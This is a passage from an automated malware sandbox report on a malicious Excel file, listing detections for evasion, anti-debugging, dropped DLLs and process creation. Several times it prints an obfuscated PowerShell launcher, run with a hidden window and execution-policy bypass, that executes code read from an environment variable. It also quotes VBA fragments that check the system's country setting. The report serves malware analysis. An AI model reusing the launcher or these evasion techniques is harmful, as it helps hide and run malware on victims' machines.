Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe	Process information set: NOOPENFILEERRORBOX

Malware Analysis System Evasion:

Document contains an embedded VBA which only executes on specific systems (country or language check)

Show sources

Source: XXX_YYYY_2019_2_3-e4261e92a0271d94f3f935b5e14f89c4.xls	Stream path '_VBA_PROJECT_CUR/VBA/ThisWorkbook' : a()opa = Application.International(xlCountrySetting) + 960
Source: XXX_YYYY_2019_2_3-e4261e92a0271d94f3f935b5e14f89c4.xls	Stream path '_VBA_PROJECT_CUR/VBA/ThisWorkbook' : lace("" + Format(0, "currency"), "0", "")End FunctionFunc

Contains long sleeps (>= 3 min)

Show sources

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477

Enumerates the file system

Show sources

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\desktop.ini	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData\Roaming\Microsoft	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData\Roaming	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows	Jump to behavior

Found dropped PE file which has not been started or loaded

Show sources

Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\h2oah0u7.dll	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\ua6j8io5.dll	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\3ndkwphw.dll	Jump to dropped file

May sleep (evasive loops) to hinder dynamic analysis

Show sources

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 1780	Thread sleep time: -60000s >= -30000s	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2796	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 216	Thread sleep time: -60000s >= -30000s	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 1900	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3452	Thread sleep time: -60000s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2984	Thread sleep time: -922337203685477s >= -30000s

Queries a list of all running processes

Show sources

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Process information queried: ProcessInformation

Jump to behavior

Anti Debugging:

Checks for kernel debuggers (NtQuerySystemInformation(SystemKernelDebuggerInformation))

Show sources

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

System information queried: KernelDebuggerInformation

Jump to behavior

Enables debug privileges

Show sources

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug

Creates guard pages, often used to prevent reverse engineering and debugging

Show sources

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Memory allocated: page read and write | page guard

Jump to behavior

HIPS / PFW / Operating System Protection Evasion:

Creates a process in suspended mode (likely to inject code)

Show sources

Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe poweRSheLL -WindOWSTylE HIdDEn -NONiNteRAC -NoPrOfIlE -NOL -exeCUt bYpASS sv ( 'yUC'+ '5' ) ( [typE](\'{0}{3}{2}{1}\'-F 'e','eNt','ironm','nv' ) ) ;${EXECUTIOnCoNtEXt}.\'INvoKEco`mMa`ND\'.\'Invo`KEs`CRIPT\'( ( ( ITem ( 'vA'+ 'RiaBl' + 'E:' +'YuC5' ) ).ValUE::( \'{4}{5}{2}{0}{6}{3}{1}\' -f'me','E','on','rIabl','gETenvi','R','nTVa' ).Invoke('MXO',( \'{1}{0}\'-f's','ProCES' ) ) ) )	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe 'C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\ua6j8io5.cmdline'	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe	Process created: C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 '/OUT:C:\Users\user~1\AppData\Local\Temp\RESADE4.tmp' 'c:\Users\user\AppData\Local\Temp\CSCAD75.tmp'	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe poweRSheLL -WindOWSTylE HIdDEn -NONiNteRAC -NoPrOfIlE -NOL -exeCUt bYpASS sv ( 'yUC'+ '5' ) ( [typE](\'{0}{3}{2}{1}\'-F 'e','eNt','ironm','nv' ) ) ;${EXECUTIOnCoNtEXt}.\'INvoKEco`mMa`ND\'.\'Invo`KEs`CRIPT\'( ( ( ITem ( 'vA'+ 'RiaBl' + 'E:' +'YuC5' ) ).ValUE::( \'{4}{5}{2}{0}{6}{3}{1}\' -f'me','E','on','rIabl','gETenvi','R','nTVa' ).Invoke('MXO',( \'{1}{0}\'-f's','ProCES' ) ) ) )	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe 'C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\3ndkwphw.cmdline'	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe poweRSheLL -WindOWSTylE HIdDEn -NONiNteRAC -NoPrOfIlE -NOL -exeCUt bYpASS sv ( 'yUC'+ '5' ) ( [typE](\'{0}{3}{2}{1}\'-F 'e','eNt','ironm','nv' ) ) ;${EXECUTIOnCoNtEXt}.\'INvoKEco`mMa`ND\'.\'Invo`KEs`CRIPT\'( ( ( ITem ( 'vA'+ 'RiaBl' + 'E:' +'YuC5' ) ).ValUE::( \'{4}{5}{2}{0}{6}{3}{1}\' -f'me','E','on','rIabl','gETenvi','R','nTVa' ).Invoke('MXO',( \'{1}{0}\'-f's','ProCES' ) ) ) )
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe 'C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\h2oah0u7.cmdline'
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe	Process created: C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 '/OUT:C:\Users\user~1\AppData\Local\Temp\RES35F0.tmp' 'c:\Users\user\AppData\Local\Temp\CSC3552.tmp'
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe	Process created: C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 '/OUT:C:\Users\user~1\AppData\Local\Temp\RES35FF.tmp' 'c:\Users\user\AppData\Local\Temp\CSC3553.tmp'

Very long cmdline option found, this is very uncommon (may be encrypted or packed)

Show sources

